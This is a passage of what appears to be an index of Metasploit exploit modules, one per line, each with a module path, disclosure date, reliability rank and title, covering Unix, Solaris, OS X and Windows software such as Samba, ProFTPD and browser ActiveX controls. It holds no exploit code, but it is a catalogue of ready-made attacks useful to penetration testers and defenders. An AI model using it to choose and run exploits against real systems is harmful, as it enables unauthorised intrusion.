multi/ntp/ntp_overflow 2001-04-04 good NTP daemon readvar Buffer Overflow
multi/php/php_unserialize_zval_cookie 2007-03-04 average PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
multi/realserver/describe 2002-12-20 great RealServer Describe Buffer Overflow
multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
multi/svn/svnserve_date 2004-05-19 average Subversion Date Svnserve
multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent Wyse Rapport Hagent Fake Hserver Command Execution
netware/smb/lsass_cifs 2007-01-21 average Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
netware/sunrpc/pkernel_callit 2009-09-30 good NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
osx/afp/loginext 2004-05-03 average AppleFileServer LoginExt PathName Overflow
osx/arkeia/type77 2005-02-18 average Arkeia Backup Client Type 77 Overflow (Mac OS X)
osx/armle/safari_libtiff 2006-08-01 good iPhone MobileSafari LibTIFF Buffer Overflow
osx/browser/mozilla_mchannel 2011-05-10 normal Mozilla Firefox 3.6.16 mChannel Use-After-Free
osx/browser/safari_file_policy 2011-10-12 normal Apple Safari file:// Arbitrary Code Execution
osx/browser/safari_libtiff 2006-08-01 good iPhone MobileSafari LibTIFF Buffer Overflow
osx/browser/safari_metadata_archive 2006-02-21 excellent Safari Archive Metadata Command Execution
osx/browser/software_update 2007-12-17 excellent Apple OS X Software Update Command Execution
osx/email/mailapp_image_exec 2006-03-01 manual Mail.app Image Attachment Command Execution
osx/email/mobilemail_libtiff 2006-08-01 good iPhone MobileMail LibTIFF Buffer Overflow
osx/ftp/webstar_ftp_user 2004-07-13 average WebSTAR FTP Server USER Overflow
osx/http/evocam_webserver 2010-06-01 average MacOS X EvoCam HTTP GET Buffer Overflow
osx/mdns/upnp_location 2007-05-25 average Mac OS X mDNSResponder UPnP Location Overflow
osx/misc/ufo_ai 2009-10-28 average UFO: Alien Invasion IRC Client Buffer Overflow
osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average MacOS X QuickTime RTSP Content-Type Overflow
osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
solaris/dtspcd/heap_noir 2002-07-10 great Solaris dtspcd Heap Overflow
solaris/lpd/sendmail_exec 2001-08-31 excellent Solaris LPD Command Execution
solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great Sun Solaris sadmind adm_build_path() Buffer Overflow
solaris/sunrpc/sadmind_exec 2003-09-13 excellent Solaris sadmind Command Execution
solaris/sunrpc/ypupdated_exec 1994-12-12 excellent Solaris ypupdated Command Execution
solaris/telnet/fuser 2007-02-12 excellent Sun Solaris Telnet Remote Authentication Bypass Vulnerability
solaris/telnet/ttyprompt 2002-01-18 excellent Solaris in.telnetd TTYPROMPT Buffer Overflow
unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution
unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
unix/http/contentkeeperweb_mimencode 2009-02-25 excellent ContentKeeper Web Remote Command Execution
unix/http/ctek_skyrouter 2011-09-08 average CTEK SkyRouter 4200 and 4300 Command Execution
unix/http/freepbx_callmenum 2012-03-20 manual FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
unix/http/lifesize_room 2011-07-13 excellent LifeSize Room Command Injection
unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
unix/misc/spamassassin_exec 2006-06-06 excellent SpamAssassin spamd Remote Command Execution
unix/misc/zabbix_agent_exec 2009-09-10 excellent Zabbix Agent net.tcp.listen Command Injection
unix/smtp/clamav_milter_blackhole 2007-08-24 excellent ClamAV Milter Blackhole-Mode Remote Code Execution
unix/smtp/exim4_string_format 2010-12-07 excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
unix/webapp/awstats_configdir_exec 2005-01-15 excellent AWStats configdir Remote Command Execution
unix/webapp/awstats_migrate_exec 2006-05-04 excellent AWStats migrate Remote Command Execution
unix/webapp/awstatstotals_multisort 2008-08-26 excellent AWStats Totals =< v1.14 multisort Remote Command Execution
unix/webapp/barracuda_img_exec 2005-09-01 excellent Barracuda IMG.PL Remote Command Execution
unix/webapp/base_qry_common 2008-06-14 excellent BASE base_qry_common Remote File Include
unix/webapp/cacti_graphimage_exec 2005-01-15 excellent Cacti graph_view.php Remote Command Execution
unix/webapp/cakephp_cache_corruption 2010-11-15 excellent CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Code Execution
unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
unix/webapp/coppermine_piceditor 2008-01-30 excellent Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
unix/webapp/dogfood_spell_exec 2009-03-03 excellent Dogfood CRM spell.php Remote Command Execution
unix/webapp/generic_exec 1993-11-14 excellent Generic Web Application Unix Command Execution
unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Google Appliance ProxyStyleSheet Command Execution
unix/webapp/guestbook_ssi_exec 1999-11-05 excellent Matt Wright guestbook.pl Arbitrary Command Execution
unix/webapp/joomla_tinybrowser 2009-07-22 excellent Joomla 1.5.12 TinyBrowser File Upload Code Execution
unix/webapp/mambo_cache_lite 2008-06-14 excellent Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
unix/webapp/mitel_awc_exec 2010-12-12 excellent Mitel Audio and Web Conferencing Command Injection
unix/webapp/mybb_backdoor 2011-10-06 excellent myBB 1.6.4 Backdoor Arbitrary Command Execution
unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent Nagios3 statuswml.cgi Ping Command Execution
unix/webapp/openview_connectednodes_exec 2005-08-25 excellent HP Openview connectedNodes.ovpl Remote Command Execution
unix/webapp/openx_banner_edit 2009-11-24 excellent OpenX banner-edit.php File Upload PHP Code Execution
unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Oracle VM Server Virtual Server Agent Command Injection
unix/webapp/oscommerce_filemanager 2009-08-31 excellent osCommerce 2.2 Arbitrary PHP Code Execution
unix/webapp/pajax_remote_exec 2006-03-30 excellent PAJAX Remote Command Execution
unix/webapp/php_eval 2008-10-13 manual Generic PHP Code Evaluation
unix/webapp/php_include 2006-12-17 normal PHP Remote File Include Generic Code Execution
unix/webapp/php_vbulletin_template 2005-02-25 excellent vBulletin misc.php Template Name Arbitrary Code Execution
unix/webapp/php_wordpress_foxypress 2012-06-05 excellent WordPress plugin Foxypress uploadify.php Arbitrary Code Execution
unix/webapp/php_wordpress_lastpost 2005-08-09 excellent WordPress cache_lastpostdate Arbitrary Code Execution
unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
unix/webapp/phpbb_highlight 2004-11-12 excellent phpBB viewtopic.php Arbitrary Code Execution
unix/webapp/phpmyadmin_config 2009-03-24 excellent PhpMyAdmin Config File Code Injection
unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent QuickTime Streaming Server parse_xml.cgi Remote Execution
unix/webapp/redmine_scm_exec 2010-12-19 excellent Redmine SCM Repository Arbitrary Command Execution
unix/webapp/sphpblog_file_upload 2005-08-25 excellent Simple PHP Blog <= 0.4.0 Remote Command Execution
unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual SquirrelMail PGP Plugin command execution (SMTP)
unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
unix/webapp/trixbox_langchoice 2008-07-09 manual Trixbox langChoice PHP Local File Inclusion
unix/webapp/twiki_history 2005-09-14 excellent TWiki History TWikiUsers rev Parameter Command Execution
unix/webapp/twiki_search 2004-10-01 excellent TWiki Search Function Arbitrary Command Execution
windows/antivirus/ams_hndlrsvc 2010-07-26 excellent Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution
windows/antivirus/ams_xfr 2009-04-28 excellent Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution
windows/antivirus/symantec_iao 2009-04-28 good Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
windows/antivirus/symantec_rtvscan 2006-05-24 good Symantec Remote Management Buffer Overflow
windows/antivirus/trendmicro_serverprotect 2007-02-20 good Trend Micro ServerProtect 5.58 Buffer Overflow
windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
windows/arkeia/type77 2005-02-18 good Arkeia Backup Client Type 77 Overflow (Win32)
windows/backdoor/energizer_duo_payload 2010-03-05 excellent Energizer DUO Trojan Code Execution
windows/backupexec/name_service 2004-12-16 average Veritas Backup Exec Name Service Overflow
windows/backupexec/remote_agent 2005-06-22 great Veritas Backup Exec Windows Remote Agent Overflow
windows/brightstor/ca_arcserve_342 2008-10-09 average Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
windows/brightstor/discovery_tcp 2005-02-14 average CA BrightStor Discovery Service TCP Overflow
windows/brightstor/discovery_udp 2004-12-20 average CA BrightStor Discovery Service Stack Buffer Overflow
windows/brightstor/etrust_itm_alert 2008-04-04 average Computer Associates Alert Notification Buffer Overflow
windows/brightstor/hsmserver 2007-09-27 great CA BrightStor HSM Buffer Overflow
windows/brightstor/lgserver 2007-01-31 average CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/lgserver_multi 2007-06-06 average CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow
windows/brightstor/lgserver_rxrlogin 2007-06-06 average CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow
windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/license_gcr 2005-03-02 average CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
windows/brightstor/mediasrv_sunrpc 2007-04-25 average CA BrightStor ArcServe Media Service Stack Buffer Overflow
windows/brightstor/message_engine 2007-01-11 average CA BrightStor ARCserve Message Engine Buffer Overflow
windows/brightstor/message_engine_72 2010-10-04 average CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow
windows/brightstor/message_engine_heap 2006-10-05 average CA BrightStor ARCserve Message Engine Heap Overflow
windows/brightstor/sql_agent 2005-08-02 average CA BrightStor Agent for Microsoft SQL Overflow
windows/brightstor/tape_engine 2006-11-21 average CA BrightStor ARCserve Tape Engine Buffer Overflow
windows/brightstor/tape_engine_8A 2010-10-04 average CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow
windows/brightstor/universal_agent 2005-04-11 average CA BrightStor Universal Agent Overflow
windows/browser/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow
windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal Adobe Flash Player MP4 ‘cprt’ Overflow
windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
windows/browser/adobe_flashplayer_avm 2011-03-15 good Adobe Flash Player AVM Bytecode Verification Vulnerability
windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal Adobe Flash Player “newfunction” Invalid Pointer Use
windows/browser/adobe_flatedecode_predictor02 2009-10-08 good Adobe FlateDecode Stream Predictor 02 Integer Overflow
windows/browser/adobe_geticon 2009-03-24 good Adobe Collab.getIcon() Buffer Overflow
windows/browser/adobe_jbig2decode 2009-02-19 good Adobe JBIG2Decode Heap Corruption
windows/browser/adobe_media_newplayer 2009-12-14 good Adobe Doc.media.newPlayer Use After Free Vulnerability
windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal Adobe Shockwave rcsL Memory Corruption
windows/browser/adobe_utilprintf 2008-02-08 good Adobe util.printf() Buffer Overflow
windows/browser/aim_goaway 2004-08-09 great AOL Instant Messenger goaway Overflow
windows/browser/amaya_bdo 2009-01-28 normal Amaya Browser v11.0 ‘bdo’ Tag Overflow
windows/browser/aol_ampx_convertfile 2009-05-19 normal AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
windows/browser/aol_icq_downloadagent 2006-11-06 excellent America Online ICQ ActiveX Control Arbitrary File Download and Execute
windows/browser/apple_itunes_playlist 2005-01-11 normal Apple ITunes 4.7 Playlist Buffer Overflow
windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
windows/browser/apple_quicktime_rtsp 2007-01-01 normal Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
windows/browser/apple_quicktime_smil_debug 2010-08-12 good Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
windows/browser/ask_shortformat 2007-09-24 normal Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
windows/browser/asus_net4switch_ipswcom 2012-02-17 normal ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow
windows/browser/athocgov_completeinstallation 2008-02-15 normal AtHocGov IWSAlerts ActiveX Control Buffer Overflow
windows/browser/autodesk_idrop 2009-04-02 normal Autodesk IDrop ActiveX Control Heap Memory Corruption
windows/browser/aventail_epi_activex 2010-08-19 normal SonicWALL Aventail epi.dll AuthCredential Format String
windows/browser/awingsoft_web3d_bof 2009-07-10 average AwingSoft Winds3D Player SceneURL Buffer Overflow
windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
windows/browser/barcode_ax49 2007-06-22 normal RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent Black Ice Cover Page ActiveX Control Arbitrary File Download
windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute
windows/browser/ca_brightstor_addcolumn 2008-03-16 normal CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
windows/browser/chilkat_crypt_writefile 2008-11-03 excellent Chilkat Crypt ActiveX WriteFile Unsafe Method
windows/browser/cisco_anyconnect_exec 2011-06-01 excellent Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
windows/browser/citrix_gateway_actx 2011-07-14 normal Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
windows/browser/communicrypt_mail_activex 2010-05-19 great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
windows/browser/creative_software_cachefolder 2008-05-28 normal Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
windows/browser/dell_webcam_crazytalk 2012-03-19 normal Dell Webcam CrazyTalk ActiveX BackImage Vulnerability
windows/browser/dxstudio_player_exec 2009-06-09 excellent Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
windows/browser/ea_checkrequirements 2007-10-08 normal Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal FlipViewer FViewerLoading ActiveX Control Buffer Overflow
windows/browser/enjoysapgui_comp_download 2009-04-15 excellent EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal EnjoySAP SAP GUI ActiveX Control Buffer Overflow
windows/browser/facebook_extractiptc 2008-01-31 normal Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
windows/browser/gom_openurl 2007-10-27 normal GOM Player ActiveX Control Buffer Overflow
windows/browser/greendam_url 2009-06-11 normal Green Dam URL Processing Buffer Overflow
windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution
windows/browser/hp_loadrunner_addfile 2008-01-25 normal Persits XUpload ActiveX AddFile Buffer Overflow
windows/browser/hp_loadrunner_addfolder 2007-12-25 good HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
windows/browser/hpmqc_progcolor 2007-04-04 normal HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
windows/browser/hyleos_chemviewx_activex 2010-02-10 good Hyleos ChemView ActiveX Control Stack Buffer Overflow
windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow
windows/browser/ibmegath_getxmlvalue 2009-03-24 normal IBM Access Support ActiveX Control Buffer Overflow
windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal IBM Lotus Domino Web Access Upload Module Buffer Overflow
windows/browser/ie_createobject 2006-04-11 excellent Internet Explorer COM CreateObject Code Execution
windows/browser/ie_iscomponentinstalled 2006-02-24 normal Internet Explorer isComponentInstalled Overflow
windows/browser/ie_unsafe_scripting 2010-09-20 excellent Internet Explorer Unsafe Scripting Misconfiguration
windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
windows/browser/intrust_annotatex_add 2012-03-28 average Quest InTrust Annotation Objects Uninitialized Pointer
windows/browser/java_basicservice_impl 2010-10-12 excellent Sun Java Web Start BasicServiceImpl Code Execution
windows/browser/java_codebase_trust 2011-02-15 excellent Sun Java Applet2ClassLoader Remote Code Execution
windows/browser/java_docbase_bof 2010-10-12 great Sun Java Runtime New Plugin docbase Buffer Overflow
windows/browser/java_mixer_sequencer 2010-03-30 great Java MixerSequencer Object GM_Song Structure Handling Vulnerability
windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent Sun Java Web Start Plugin Command Line Argument Injection
windows/browser/java_ws_vmargs 2012-02-14 excellent Sun Java Web Start Plugin Command Line Argument Injection
windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
windows/browser/kazaa_altnet_heap 2007-10-03 normal Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
windows/browser/logitechvideocall_start 2007-05-31 normal Logitech VideoCall ActiveX Control Buffer Overflow
windows/browser/lpviewer_url 2008-10-06 normal iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
windows/browser/macrovision_downloadandexecute 2007-10-31 normal Macrovision InstallShield Update Service Buffer Overflow
windows/browser/macrovision_unsafe 2007-10-20 excellent Macrovision InstallShield Update Service ActiveX Unsafe Method
windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal McAfee Subscription Manager Stack Buffer Overflow
windows/browser/mcafee_mvt_exec 2012-04-30 excellent McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability
windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal McAfee Visual Trace ActiveX Control Buffer Overflow
windows/browser/mirc_irc_url 2003-10-13 normal mIRC IRC URL Buffer Overflow
windows/browser/mozilla_attribchildremoved 2011-12-06 average Firefox 8/9 AttributeChildRemoved() Use-After-Free
windows/browser/mozilla_interleaved_write 2010-10-25 normal Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
windows/browser/mozilla_mchannel 2011-05-10 normal Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
windows/browser/mozilla_nssvgvalue 2011-12-06 average Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability
windows/browser/mozilla_nstreerange 2011-02-02 normal Mozilla Firefox “nsTreeRange” Dangling Pointer Vulnerability
windows/browser/mozilla_reduceright 2011-06-21 normal Mozilla Firefox Array.reduceRight() Integer Overflow
windows/browser/ms03_020_ie_objecttype 2003-06-04 normal MS03-020 Internet Explorer Object Type
windows/browser/ms05_054_onload 2005-11-21 normal MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
windows/browser/ms06_013_createtextrange 2006-03-19 normal Internet Explorer createTextRange() Code Execution
windows/browser/ms06_055_vml_method 2006-09-19 normal Internet Explorer VML Fill Method Code Execution
windows/browser/ms06_057_webview_setslice 2006-07-17 normal Internet Explorer WebViewFolderIcon setSlice() Overflow
windows/browser/ms06_067_keyframe 2006-11-14 normal Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
windows/browser/ms06_071_xml_core 2006-10-10 normal Internet Explorer XML Core Services HTTP Request Handling
windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
windows/browser/ms08_053_mediaencoder 2008-09-09 normal Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
windows/browser/ms08_078_xml_corruption 2008-12-07 normal Internet Explorer Data Binding Memory Corruption
windows/browser/ms09_002_memory_corruption 2009-02-10 normal Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
windows/browser/ms09_043_owc_msdso 2009-07-13 normal Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
windows/browser/ms09_072_style_object 2009-11-20 normal Internet Explorer Style getElementsByTagName Memory Corruption
windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer “Aurora” Memory Corruption
windows/browser/ms10_002_ie_object 2010-01-21 normal MS10-002 Internet Explorer Object Memory Use-After-Free
windows/browser/ms10_018_ie_behaviors 2010-03-09 good Internet Explorer DHTML Behaviors Use After Free
windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great Internet Explorer Winhlp32.exe MsgBox Code Execution
windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent Microsoft Windows Shell LNK Code Execution
windows/browser/ms10_090_ie_css_clip 2010-11-03 good Internet Explorer CSS SetUserClip Memory Corruption
windows/browser/ms11_003_ie_css_import 2010-11-29 good Internet Explorer CSS Recursive Import Use After Free
windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal MS11-050 IE mshtml!CObjectElement Use After Free
windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
windows/browser/msvidctl_mpeg2 2009-07-05 normal Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
windows/browser/mswhale_checkforupdates 2009-04-15 normal Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
windows/browser/nis2004_antispam 2004-03-19 normal Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
windows/browser/nis2004_get 2007-05-16 normal Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
windows/browser/novelliprint_callbackurl 2010-08-20 normal Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
windows/browser/novelliprint_datetime 2009-12-08 great Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
windows/browser/novelliprint_executerequest 2008-02-22 normal Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow
windows/browser/novelliprint_getdriversettings 2008-06-16 normal Novell iPrint Client ActiveX Control Buffer Overflow
windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow
windows/browser/novelliprint_target_frame 2009-12-08 great Novell iPrint Client ActiveX Control target-frame Buffer Overflow
windows/browser/oracle_dc_submittoexpress 2009-08-28 normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
windows/browser/orbit_connecting 2009-02-03 normal Orbit Downloader Connecting Log Creation Buffer Overflow
windows/browser/pcvue_func 2011-10-05 average PcVue 10.0 SV.UIGrdCtrl.1 ‘LoadObject()/SaveObject()’ Trusted DWORD Vulnerability
windows/browser/persits_xupload_traversal 2009-09-29 excellent Persits XUpload ActiveX MakeHttpRequest Directory Traversal
windows/browser/real_arcade_installerdlg 2011-04-03 normal Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
windows/browser/realplayer_cdda_uri 2010-11-15 normal RealNetworks RealPlayer CDDA URI Initialization Vulnerability
windows/browser/realplayer_console 2008-03-08 normal RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
windows/browser/realplayer_import 2007-10-18 normal RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
windows/browser/realplayer_qcp 2011-08-16 average RealNetworks Realplayer QCP Parsing Heap Overflow
windows/browser/realplayer_smil 2005-03-01 normal RealNetworks RealPlayer SMIL Buffer Overflow
windows/browser/roxio_cineplayer 2007-04-11 normal Roxio CinePlayer ActiveX Control Buffer Overflow
windows/browser/safari_xslt_output 2011-07-20 excellent Apple Safari Webkit libxslt Arbitrary File Creation
windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow
windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal SAP AG SAPgui EAI WebViewer3D Buffer Overflow
windows/browser/softartisans_getdrivename 2008-08-25 normal SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
windows/browser/sonicwall_addrouteentry 2007-11-01 normal SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute
windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
windows/browser/symantec_appstream_unsafe 2009-01-15 excellent Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute
windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal Symantec BackupExec Calendar Control Buffer Overflow
windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal Symantec ConsoleUtilities ActiveX Control Buffer Overflow
windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
windows/browser/teechart_pro 2011-08-11 normal TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
windows/browser/trendmicro_extsetowner 2010-08-25 normal Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
windows/browser/trendmicro_officescan 2007-02-12 normal Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
windows/browser/tumbleweed_filetransfer 2008-04-07 great Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
windows/browser/ultraoffice_httpupload 2008-08-27 good Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
windows/browser/verypdf_pdfview 2008-06-16 normal VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal Viscom Software Movie Player Pro SDK ActiveX 6.8
windows/browser/vlc_amv 2011-03-23 good VLC AMV Dangling Pointer Vulnerability
windows/browser/vlc_mms_bof 2012-03-15 normal VLC MMS Stream Handling Buffer Overflow
windows/browser/webdav_dll_hijacker 2010-08-18 manual WebDAV Application DLL Hijacker
